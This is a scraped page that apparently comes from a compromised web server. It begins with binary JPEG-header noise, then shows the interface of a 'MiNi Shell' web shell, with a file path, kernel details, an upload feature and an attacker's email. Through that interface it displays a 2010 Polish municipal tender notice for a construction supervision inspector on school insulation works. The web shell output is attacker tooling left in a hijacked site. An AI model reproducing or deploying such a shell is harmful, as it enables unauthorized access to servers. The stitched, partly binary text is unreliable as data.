JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/3841-N-2010.html

<p class="kh_header"><b>Połczyn-Zdrój: Pełnienie czynności Inspektora nadzoru dla zadania inwestycyjnego współfinansowanego ze srodków Unii Europejskiej wg Projektu pn: Termomodernizacja obiektów użyteczności publicznej na terenie powiatów: białogardzkiego, drawskiego, kołobrzeskiego, koszalińskiego, szczecineckiego i świdwińskiego - dla obiektów oświatowych położonych na terenie Gminy Połczyn-Zdrój</b><br>
<b>Numer ogłoszenia: 3841 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Połczynie-Zdroju , Plac Wolności 3-4, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 094 3662400, faks 094 3666105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polczyn-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie czynności Inspektora nadzoru dla zadania inwestycyjnego współfinansowanego ze srodków Unii Europejskiej wg Projektu pn: Termomodernizacja obiektów użyteczności publicznej na terenie powiatów: białogardzkiego, drawskiego, kołobrzeskiego, koszalińskiego, szczecineckiego i świdwińskiego - dla obiektów oświatowych położonych na terenie Gminy Połczyn-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na  pełnieniu czynności Inspektora nadzoru dla zadania inwestycyjnego współfinansowanego ze srodków Unii Europejskiej wg Projektu pn: Termomodernizacja obiektów użyteczności publicznej na terenie powiatów: białogardzkiego, drawskiego, kołobrzeskiego, koszalińskiego, szczecineckiego i świdwińskiego - dla obiektów oświatowych położonych na terenie Gminy Połczyn-Zdrój

Przedmiotem robót budowlanych jest wykonanie termomodernizacji :
a/ budynku głównego, pawilonu dydaktycznego i sali gimnastycznej Publicznej Szkoły    
    Podstawowej nr 1 przy ul. Grunwaldzkiej 34 w Połczynie-Zdroju,
b/ budynku Zespołu Szkół Publicznych w Redle,
c/ budynku Przedszkola Samorządowego w Redle, 
zgodnie z zapisami niniejszej SIWZ i jej załącznikami. 
Przedmiot zamówienia obejmuje m.in.: 
a)	w budynkach Publicznej Szkoły Podstawowej w Połczynie-Zdroju
- ocieplenie ścian zewnętrznych i fundamentowych,
- ocieplenie dachu,
- wymianę stolarki okiennej i drzwiowej,
- wymianę istniejącej instalacji c.o.,
- wykonanie instalacji ciepłej wody użytkowej w oparciu o pompy ciepła.
b)	w budynku Zespołu Szkół Publicznych w Redle
- ocieplenie ścian zewnętrznych z wymiana parapetów zewnętrznych,
- wymianę stolarki okiennej i drzwiowej,
- ocieplenie stropodachu z ułożeniem pokrycia dachowego z pap termozgrzewalnych 
  dwuwarstwowo, wymiana blacharki i orynnowania.
c)	w budynku Przedszkola Samorzadowego w Redle
- ocieplenie ścian zewnętrznych z wymiana parapetów zewnętrznych,
- wymianę stolarki okiennej i drzwiowej,
- ocieplenie stropodachu z ułożeniem pokrycia dachowego z pap termozgrzewalnych 
  dwuwarstwowo, wymiana blacharki i orynnowania.

Szczegółowy zakres i opis robót budowlanych zawiera - przedmiar robót , dokumentacja projektowa oraz Specyfikacja Techniczna Wykonania i Odbioru Robót.

Generalnie zadaniem Inspektora nadzoru jest pełnienie tej funkcji zgodnie z ustawą - Prawo budowlane. Inspektor nadzoru ma za zadanie czuwać nad prawidłową realizacją projektu oraz terminem realizacji prac.

PODSTAWOWE OBOWIĄZKI INSPEKTORA NADZORU W TRAKCIE PROWADZENIA ROBÓT BUDOWLANO-MONTAŻOWYCH POLEGAĆ BĘDĄ NA :
- przekazaniu Wykonawcy robót placu budowy,
- przejęciu od Wykonawcy robót uzgodnionych harmonogramów przedstawiających cykl  
  realizacji inwestycji,
- stałym uczestnictwie w naradach technicznych koordynacyjnych i innych organizowanych 
  przez wszystkie strony procesu inwestycyjnego,

- sprawdzaniu przez Inspektorów nadzoru w poszczególnych branżach kosztorysów 
  powykonawczych, obmiarów robót a także o ile zajdzie taka potrzeba faktur za wykonane  
   roboty wraz z ich opisaniem do zapłaty w terminie 5 dni od daty ich otrzymania,
- wydawaniu zgody na wykonanie ewentualnych robót dodatkowych po uprzedniej 
  konsultacji z Zamawiającym,
- podejmowaniu wszelkich racjonalnych działań umożliwiających prawidłową realizację 
  harmonogramu,
- prowadzeniu pełnobranżowego nadzoru technicznego nad realizacją robót zgodnie z  
  prawem budowlanym (łącznie z przygotowaniem koniecznych dokumentów do uzyskania  
  pozwolenia na użytkowanie) oraz kontroli wykonywanych robót zgodnie z przepisami bhp,
- sprawdzaniu i odbiorze robót budowlanych ulegających zakryciu lub zanikających , 
  uczestniczeniu w próbach i odbiorach technicznych instalacji urządzeń technicznych oraz  
  gotowego obiektu,
- współdziałaniu z Projektantem i Zamawiającym w zakresie zgodności realizacji inwestycji 
  z projektem budowlanym,
- stałej konsultacji i doradztwie fachowym na rzecz Zamawiającego,
- współpracy z nadzorem autorskim (łącznie ze zmianami pozwoleń na budowę),
- sprawdzaniu jakości wbudowanych materiałów, a w szczególności zapobieganiu 
   zastosowania wyrobów wadliwych i nie dopuszczonych do stosowania w budownictwie 
   zgodnie z obowiązującymi przepisami,
- kontrolowanie rozliczeń budowy - Inspektor Nadzoru odpowiada przed Zamawiającym za  
   nieprawidłowość dokonanych rozliczeń za roboty budowlano-montażowe,
- odbiór inwestycji zgodnie z obowiązującymi przepisami.

Częstotliwość pobytu poszczególnych Inspektorów Nadzoru na budowie powinna być taka, aby nie hamowała postępu robót, jednak nie mniej niż 1 raz w tygodniu.

Zwycięzca przetargu powinien w trakcie całego procesu inwestycyjnego podejmować także inne działania , nie wymienione powyżej , które zabezpieczać będą interes Zamawiającego 
i przyczynią się do sprawnego realizowania inwestycji.
                                                                   
WYKONAWCA JEST ODPOWIEDZIALNY ZA :  - jakość świadczonych usług,    - należytą staranność przy realizacji zobowiązań umowy,    - za szkody wyrządzone podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące 
    warunki:
  1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli        
      ustawy  nakładają obowiązek posiadania takich uprawnień;
     Wykonawca jest zobowiązany przedstawić :
   - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  
      rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie      
      wcześniej niż 6 miesięcy przed upływem terminu składania ofert                     
  1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
       i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
       innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia
      Wykonawca jest zobowiązany przedstawić :
   - oświadczenie , iż posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem
      technicznym oraz osobami zdolnymi do wykonania zamówienia ;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia                                                                                                               
      Wykonawca jest zobowiązany przedstawić :
    - oświadczenie; iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
      wykonanie zamówienia     
 1.4.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
      Wykonawca jest zobowiązany przedstawić :
  - oświadczenie do postępowania o zamówienie publiczne w trybie art. 22 ust.l 
     ustawy Prawo zamówień publicznych.






2. Warunki szczegółowe wymagane od Wykonawców 
                                                                           - Minimalne wymagania kwalifikacyjne

2.1. Wykonawca musi być zarejestrowany jako zdolny do realizacji określonych prac ,
2.2.  wszystkie osoby uczestniczące w wykonaniu zamówienia winne posiadać przynajmniej 
    3-letnie doświadczenie oraz udowodnione kwalifikacje w zakresie wykonywania prac 
    o charakterze podobnym do przewidzianych w zamówieniu ,
2.3. Wykonawca musi posiadać zatrudnionych na umowę o pracę Inspektorów nadzoru 
    z uprawnieniami w następujących branżach :
    1/ konstrukcyjno-budowlanej, 
    2 instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych i elektrycznych, 
   oraz dokumenty potwierdzające ich przynależność do właściwych samorządów   
   zawodowych.
2.4. doświadczenie Wykonawcy :
     - w ciągu ostatnich 3 lat Wykonawca zrealizował min. jeden Kontrakt o zakresie 
       i charakterze porównywalnym i o wartości  prac  porównywalnej z ceną oferty,
2.5. Wykonawca winien posiadać polisę, a w przypadku jej braku inny dokument 
       potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
       w zakresie prowadzonej działalności. 

Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez Wykonawców do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane:
 - formularz ofertowy  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
   zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
   6 miesięcy przed upływem terminu składania ofert, - dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 
   przepisów prawa lub innych dokumentów rejestrowych,
- oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków, opłat oraz składek na 
   ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane 
   prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
   w całości wykonania decyzji właściwego organu,
- oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 
   ust. 1 pkt 1-3 i nie wykluczeniu z postępowania na mocy    
   art.24 ust. 1 i 2  ustawy Prawo zamówień publicznych

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert; 2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Dokumenty wymagane w przypadku składania oferty wspólnej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
Ponadto oferta powinna zawierać :
- umowę regulującą współpracę podmiotów występujących wspólnie, - dokumenty formalne dla każdego partnera z osobna, pozostałe dokumenty składane są 
  wspólnie.  
Inne dokumenty:
W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, 
potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty :
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich 
  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 
  zamówienia, a także zakresu wykonywanych przez nich czynności
- pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do  
   wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, Wykonawca 
   wskazał osoby, którymi będzie dysponował,
 - wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim  
    rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z 
    podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
    potwierdzających, że usługi te zostały wykonane należycie
 
W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w  
       sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy 
       złożyć następujące dokumenty: 
    - opłacona polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca   
  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
  działalności.  

Dokumenty dodatkowe          - parafowany projekt umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.polczyn-zdroj.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
pok. nr 206 ( II piętro ).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2010 godzina 12:00, miejsce: Urząd Miejski w Połczynie-Zdroju
Plac Wolności 3-4
78-320 Połczyn-Zdrój
Sekretariat lub pok. nr 206 ( II piętro ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com